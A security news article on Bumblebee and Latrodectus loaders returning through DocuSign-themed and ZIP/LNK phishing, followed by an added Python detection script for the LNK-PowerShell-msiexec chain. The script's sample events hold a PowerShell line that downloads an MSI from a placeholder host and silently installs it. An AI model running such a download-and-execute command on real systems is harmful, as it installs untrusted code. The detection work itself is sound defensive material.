Bumblebee and Latrodectus malware are back with sophisticated phishing strategies

By Admin | October 22, 2024 | 3 Mins Read
October 22, 2024Ravi LakshmananMalware / Threat Intelligence

Bumblebee and Latrodectus malware

Two malware families that were disrupted by the coordinated law enforcement operation called Endgame have reappeared as part of new phishing campaigns.

The families are Bumblebee and Latrodectus, both malware loaders designed to steal personal data and to download and execute additional payloads on compromised hosts.

Latrodectus, also tracked as BlackWidow, IceNova, Lotus or Unidentified 111, is considered a successor to IcedID because of overlapping infrastructure between the two malware families. It has been used in campaigns associated with two initial access brokers (IABs) known as TA577 (aka Water Curupira) and TA578.

In May 2024, a coalition of European countries announced that it had dismantled over 100 servers associated with multiple malware strains, including IcedID (and by extension Latrodectus), SystemBC, PikaBot, SmokeLoader, Bumblebee and TrickBot.

“Although Latrodectus was not mentioned in the operation, it was also affected and its infrastructure was disabled,” Bitsight security researcher Joao Batista noted back in June 2024.

Cybersecurity firm Trustwave, in an analysis published earlier this month, described Latrodectus as a “distinct threat” that got a boost after Operation Endgame.

“Although Latrodectus was initially impacted, it quickly recovered. Its advanced capabilities have filled the void left by its limited counterparts, proving itself to be a formidable threat,” the cybersecurity company said.

The attack chains typically rely on spam campaigns that use hijacked email threads and impersonate legitimate entities such as Microsoft Azure and Google Cloud to trigger the malware deployment process.

The infection sequences recently observed by Forcepoint and Logpoint follow the same route: DocuSign-themed emails carrying either PDF attachments that contain a malicious link or HTML files with embedded JavaScript code, designed to download an MSI installer and a PowerShell script, respectively.

Regardless of the method used, the attack ends up deploying a malicious DLL file, which in turn launches the Latrodectus malware.

“Latrodectus leverages legacy infrastructure combined with an innovative new method of distributing malware payloads across the financial, automotive and business sectors,” said Forcepoint researcher Mayur Sewani.

The current Latrodectus campaigns are coupled with the return of the Bumblebee downloader, which uses a ZIP archive as its delivery mechanism, likely downloaded via phishing emails.

“The ZIP file contains an LNK file called ‘Report-41952.lnk’ which, when executed, triggers a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL to disk,” Netskope researcher Leandro Froes said.

The LNK file is designed to run a PowerShell command that downloads the MSI installer from a remote server. Once launched, the MSI samples, which masquerade as installers from NVIDIA and Midjourney, serve as conduits to launch the Bumblebee DLL.

“Bumblebee uses a more stealthy approach to avoid spawning other processes and avoids writing the final payload to disk,” Froes noted.

“It is done by using the SelfReg table to force the execution of the DllRegisterServer export function present in the File table. An entry in the SelfReg table acts as a key to indicate which file to execute in the File table, and in our case it was the final payload DLL.”
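As an added, defender-side example that is not part of the original article or of any vendor's tooling, the following Python hunt flags the LNK-to-PowerShell-to-msiexec chain described above when run over process-creation events; the event field names and the sample events are constructed assumptions, not real telemetry.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified);
# field names and values are assumptions for this example, not real telemetry.
EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # PowerShell spawned by Explorer when the user opens the LNK inside the ZIP
    {"pid": 11, "ppid": 10,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -c "iwr http://example.invalid/nv.msi '
            r'-o $env:TEMP\nv.msi; msiexec /i $env:TEMP\nv.msi /qn"'},
    # msiexec started by that PowerShell on an MSI in the user's Temp directory
    {"pid": 12, "ppid": 11, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\alice\AppData\Local\Temp\nv.msi /qn"},
    # Benign install launched by a deployment service; must not fire
    {"pid": 20, "ppid": 2, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\ProgramData\Deploy\vendor-agent.msi /qn"},
]

DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl)\b", re.I)
USER_DIR_RE = re.compile(r"\\(Temp|Downloads|AppData)\\", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}


def image_name(path):
    """Return the lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_lnk_msi_chain(events):
    """Return (pid, reason) findings for the LNK -> PowerShell -> msiexec pattern.

    Process creation alone cannot see the SelfReg-driven DllRegisterServer call
    inside msiexec; pair this with image-load telemetry on msiexec.exe for that step.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = image_name(parent["image"]) if parent else ""
        cmd = e["cmd"].lower()
        if (name in SHELLS and parent_name == "explorer.exe"
                and DOWNLOAD_RE.search(cmd) and "msiexec" in cmd):
            findings.append((e["pid"], "PowerShell under Explorer downloads and runs an MSI"))
        elif name == "msiexec.exe" and (parent_name in SHELLS or USER_DIR_RE.search(cmd)):
            findings.append((e["pid"], "msiexec spawned by PowerShell or run on a user-writable MSI"))
    return findings
```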
